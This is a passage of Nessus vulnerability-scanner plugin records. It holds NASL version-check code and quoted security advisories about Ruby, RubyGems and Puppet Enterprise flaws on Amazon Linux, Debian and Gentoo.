(rpm_check(release:\"ALA\", reference:\"ruby21-irb-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-libs-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-bigdecimal-1.2.4-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-io-console-0.4.3-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-psych-2.0.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems21-2.2.3-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems21-devel-2.2.3-1.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby21 / ruby21-debuginfo / ruby21-devel / ruby21-doc / ruby21-irb / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:14:28", "description": "Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method.\nAttacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\nRubyGems contains a Directory Traversal vulnerability in install_location function of package.rb that can result in path traversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\nRubyGems contains a Deserialization of Untrusted Data vulnerability in owner command that can result in code execution. This attack appear to be exploitable via victim must run the `gem owner` command on a gem with a specially crafted YAML file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-29T00:00:00", "type": "nessus", "title": "Debian DLA-1480-1 : ruby2.1 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1-dev", "p-cpe:/a:debian:debian_linux:ruby2.1-doc", "p-cpe:/a:debian:debian_linux:ruby2.1-tcltk", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1480.NASL", "href": "https://www.tenable.com/plugins/nessus/112167", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1480-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112167);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2337\", \"CVE-2018-1000073\", \"CVE-2018-1000074\");\n\n script_name(english:\"Debian DLA-1480-1 : ruby2.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method.\nAttacker passing different type of object than String as 'retval'\nargument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\nRubyGems contains a Directory Traversal vulnerability in\ninstall_location function of package.rb that can result in path\ntraversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\nRubyGems contains a Deserialization of Untrusted Data vulnerability in\nowner command that can result in code execution. This attack appear to\nbe exploitable via victim must run the `gem owner` command on a gem\nwith a specially crafted YAML file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/ruby2.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libruby2.1\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-dev\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-doc\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-tcltk\", reference:\"2.1.5-2+deb8u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:14", "description": "According to its self-reported version number, the Puppet Enterprise application running on the remote host is version 3.7.x or 3.8.x prior to 3.8.1. It it, therefore, affected by the following vulnerabilities :\n\n - A flaw exists in RubyGems due to a failure to validate hostnames when fetching gems or making API requests. A remote attacker, using a crafted DNS SRV record, can exploit this to redirect requests to arbitrary domains.\n (CVE-2015-3900)\n\n - A flaw exists in RubyGems due to a failure to sanitize DNS responses, which allows a man-in-the-middle attacker to install arbitrary applications. (CVE-2015-4020)\n\n - A flaw exists in Puppet Enterprise related to how certificates are managed, under certain vulnerable configurations, which allows a trusted certificate to be used to perform full certificate management. An attacker can exploit this flaw to revoke the certificates of other nodes or to approve their certificate requests.\n (CVE-2015-4100)\n\nNote that the default 'monolithic', 'split', and 'multimaster' installations of Puppet Enterprise are not affected by CVE-2015-4100.", "cvss3": {}, "published": "2015-07-23T00:00:00", "type": "nessus", "title": "Puppet Enterprise 3.7.x < 3.8.1 / 3.8.x < 3.8.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020", "CVE-2015-4100"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:puppetlabs:puppet"], "id": "PUPPET_ENTERPRISE_CVE_2015-4100.NASL", "href": "https://www.tenable.com/plugins/nessus/84961", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84961);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\", \"CVE-2015-4100\");\n script_bugtraq_id(75431, 75482);\n\n script_name(english:\"Puppet Enterprise 3.7.x < 3.8.1 / 3.8.x < 3.8.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Puppet Enterprise version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Puppet Enterprise\napplication running on the remote host is version 3.7.x or 3.8.x\nprior to 3.8.1. It it, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in RubyGems due to a failure to validate\n hostnames when fetching gems or making API requests. A\n remote attacker, using a crafted DNS SRV record, can\n exploit this to redirect requests to arbitrary domains.\n (CVE-2015-3900)\n\n - A flaw exists in RubyGems due to a failure to sanitize\n DNS responses, which allows a man-in-the-middle attacker\n to install arbitrary applications. (CVE-2015-4020)\n\n - A flaw exists in Puppet Enterprise related to how\n certificates are managed, under certain vulnerable\n configurations, which allows a trusted certificate to be\n used to perform full certificate management. An attacker\n can exploit this flaw to revoke the certificates of\n other nodes or to approve their certificate requests.\n (CVE-2015-4100)\n\nNote that the default 'monolithic', 'split', and 'multimaster'\ninstallations of Puppet Enterprise are not affected by CVE-2015-4100.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://puppet.com/security/cve/CVE-2015-4100\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.rubygems.org/2015/05/14/CVE-2015-3900.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://groups.google.com/forum/#!topic/puppet-announce/mnV70g2PttQ\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Puppet Enterprise 3.8.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3900\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:puppetlabs:puppet\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"puppet_rest_detect.nasl\");\n script_require_keys(\"puppet/rest_port\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\napp_name = \"Puppet Enterprise\";\n\nport = get_kb_item_or_exit('puppet/rest_port');\nver = get_kb_item_or_exit('puppet/' + port + '/version');\n\nif ('Enterprise' >< ver)\n{\n # convert something like\n # 2.7.19 (Puppet Enterprise 2.7.0)\n # to\n # 2.7.0\n match = eregmatch(string:ver, pattern:\"Enterprise ([0-9.]+)\\)\");\n if (isnull(match)) audit(AUDIT_UNKNOWN_WEB_APP_VER, app_name, build_url(port:port));\n ver = match[1];\n}\nelse audit(AUDIT_WEB_APP_NOT_INST, app_name, port);\n\nif (\n ver =~ \"^3\\.7($|[^0-9])\" ||\n ver =~ \"^3\\.8\\.0($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : Puppet Enterprise ' + ver +\n '\\n Fixed version : Puppet Enterprise 3.8.1\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, build_url(port:port), ver);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:20", "description": "The remote host is affected by the vulnerability described in GLSA-201710-18 (Ruby: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Ruby. Please review the referenced CVE identifiers for details.\n Impact :\n\n A remote attacker could execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "nessus", "title": "GLSA-201710-18 : Ruby: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ruby", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201710-18.NASL", "href": "https://www.tenable.com/plugins/nessus/103911", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201710-18.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103911);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2337\", \"CVE-2017-0898\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"GLSA\", value:\"201710-18\");\n\n script_name(english:\"GLSA-201710-18 : Ruby: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201710-18\n(Ruby: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Ruby. Please review the\n referenced CVE identifiers for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code, cause a Denial of\n Service condition, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201710-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Ruby users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/ruby-2.2.8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/ruby\", unaffected:make_list(\"ge 2.2.8\"), vulnerable:make_list(\"lt 2.2.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:10", "description": "Multiple vulnerabilities were found in the interpreter for the Ruby language. The Common Vulnerabilities and Exposures project identifies the following issues :\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO or MAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the OpenSSL extension.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\nDoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\ngem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\nRubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\nMax Justicz reported that RubyGems is prone to an unsafe object deserialization vulnerability. When parsed by an application which processes gems, a specially crafted YAML formatted gem specification can lead to remote code execution.\n\nCVE-2017-10784\n\nYusuke Endoh discovered an escape sequence injection vulnerability in the Basic authentication of WEBrick. An attacker can take advantage of this flaw to inject malicious escape sequences to the WEBrick log and potentially execute control characters on the victim's terminal emulator when reading logs.\n\nCVE-2017-14033\n\nasac reported a buffer underrun vulnerability in the OpenSSL extension. A remote attacker could take advantage of this flaw to cause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\nHeap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\nA command injection vulnerability in Net::FTP might allow a malicious FTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\nAaron Patterson reported that WEBrick bundled with Ruby was vulnerable to an HTTP response splitting vulnerability. It was possible for an attacker to inject fake HTTP responses if a script accepted an external input and output it without modifications.\n\nCVE-2017-17790\n\nA command injection vulnerability in lib/resolv.rb's lazy_initialze might allow a command injection attack. However untrusted input to this function is rather unlikely.\n\nCVE-2018-6914\n\nooooooo_q discovered a directory traversal vulnerability in the Dir.mktmpdir method in the tmpdir library. It made it possible for attackers to create arbitrary directories or files via a .. (dot dot) in the prefix argument.\n\nCVE-2018-8777\n\nEric Wong reported an out-of-memory DoS vulnerability related to a large request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\naerodudrizzt found a buffer under-read vulnerability in the Ruby String#unpack method. If a big number was passed with the specifier @, the number was treated as a negative value, and an out-of-buffer read occurred. Attackers could read data on heaps if an script accepts an external input as the argument of String#unpack.\n\nCVE-2018-8779\n\nooooooo_q reported that the UNIXServer.open and UNIXSocket.open methods of the socket library bundled with Ruby did not check for NUL bytes in the path argument. The lack of check made the methods vulnerable to unintentional socket creation and unintentional socket access.\n\nCVE-2018-8780\n\nooooooo_q discovered an unintentional directory traversal in some methods in Dir, by the lack of checking for NUL bytes in their parameter.\n\nCVE-2018-1000075\n\nA negative size vulnerability in ruby gem package tar header that could cause an infinite loop.\n\nCVE-2018-1000076\n\nRubyGems package improperly verifies cryptographic signatures. A mis-signed gem could be installed if the tarball contains multiple gem signatures.\n\nCVE-2018-1000077\n\nAn improper input validation vulnerability in RubyGems specification homepage attribute could allow malicious gem to set an invalid homepage URL.\n\nCVE-2018-1000078\n\nCross Site Scripting (XSS) vulnerability in gem server display of homepage attribute.\n\nCVE-2018-1000079\n\nPath Traversal vulnerability during gem installation.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-07-16T00:00:00", "type": "nessus", "title": "Debian DLA-1421-1 : ruby2.1 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1-dev", "p-cpe:/a:debian:debian_linux:ruby2.1-doc", "p-cpe:/a:debian:debian_linux:ruby2.1-tcltk", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1421.NASL", "href": "https://www.tenable.com/plugins/nessus/111081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1421-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111081);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-9096\", \"CVE-2016-2339\", \"CVE-2016-7798\", \"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17742\", \"CVE-2017-17790\", \"CVE-2018-1000075\", \"CVE-2018-1000076\", \"CVE-2018-1000077\", \"CVE-2018-1000078\", \"CVE-2018-1000079\", \"CVE-2018-6914\", \"CVE-2018-8777\", \"CVE-2018-8778\", \"CVE-2018-8779\", \"CVE-2018-8780\");\n\n script_name(english:\"Debian DLA-1421-1 : ruby2.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues :\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO or\nMAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the\nOpenSSL extension.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\nDoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\ngem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\nRubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\nMax Justicz reported that RubyGems is prone to an unsafe object\ndeserialization vulnerability. When parsed by an application which\nprocesses gems, a specially crafted YAML formatted gem specification\ncan lead to remote code execution.\n\nCVE-2017-10784\n\nYusuke Endoh discovered an escape sequence injection vulnerability in\nthe Basic authentication of WEBrick. An attacker can take advantage of\nthis flaw to inject malicious escape sequences to the WEBrick log and\npotentially execute control characters on the victim's terminal\nemulator when reading logs.\n\nCVE-2017-14033\n\nasac reported a buffer underrun vulnerability in the OpenSSL\nextension. A remote attacker could take advantage of this flaw to\ncause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\nHeap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\nA command injection vulnerability in Net::FTP might allow a malicious\nFTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\nAaron Patterson reported that WEBrick bundled with Ruby was vulnerable\nto an HTTP response splitting vulnerability. It was possible for an\nattacker to inject fake HTTP responses if a script accepted an\nexternal input and output it without modifications.\n\nCVE-2017-17790\n\nA command injection vulnerability in lib/resolv.rb's lazy_initialze\nmight allow a command injection attack. However untrusted input to\nthis function is rather unlikely.\n\nCVE-2018-6914\n\nooooooo_q discovered a directory traversal vulnerability in the\nDir.mktmpdir method in the tmpdir library. It made it possible for\nattackers to create arbitrary directories or files via a .. (dot dot)\nin the prefix argument.\n\nCVE-2018-8777\n\nEric Wong reported an out-of-memory DoS vulnerability related to a\nlarge request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\naerodudrizzt found a buffer under-read vulnerability in the Ruby\nString#unpack method. If a big number was passed with the specifier @,\nthe number was treated as a negative value, and an out-of-buffer read\noccurred. Attackers could read data on heaps if an script accepts an\nexternal input as the argument of String#unpack.\n\nCVE-2018-8779\n\nooooooo_q reported that the UNIXServer.open and UNIXSocket.open\nmethods of the socket library bundled with Ruby did not check for NUL\nbytes in the path argument. The lack of check made the methods\nvulnerable to unintentional socket creation and unintentional socket\naccess.\n\nCVE-2018-8780\n\nooooooo_q discovered an unintentional directory traversal in some\nmethods in Dir, by the lack of checking for NUL bytes in their\nparameter.\n\nCVE-2018-1000075\n\nA negative size vulnerability in ruby gem package tar header that\ncould cause an infinite loop.\n\nCVE-2018-1000076\n\nRubyGems package improperly verifies cryptographic signatures. A\nmis-signed gem could be installed if the tarball contains multiple gem\nsignatures.\n\nCVE-2018-1000077\n\nAn improper input validation vulnerability in RubyGems specification\nhomepage attribute could allow malicious gem to set an invalid\nhomepage URL.\n\nCVE-2018-1000078\n\nCross Site Scripting (XSS) vulnerability in gem server display of\nhomepage attribute.\n\nCVE-2018-1000079\n\nPath Traversal vulnerability during gem installation.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/ruby2.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by 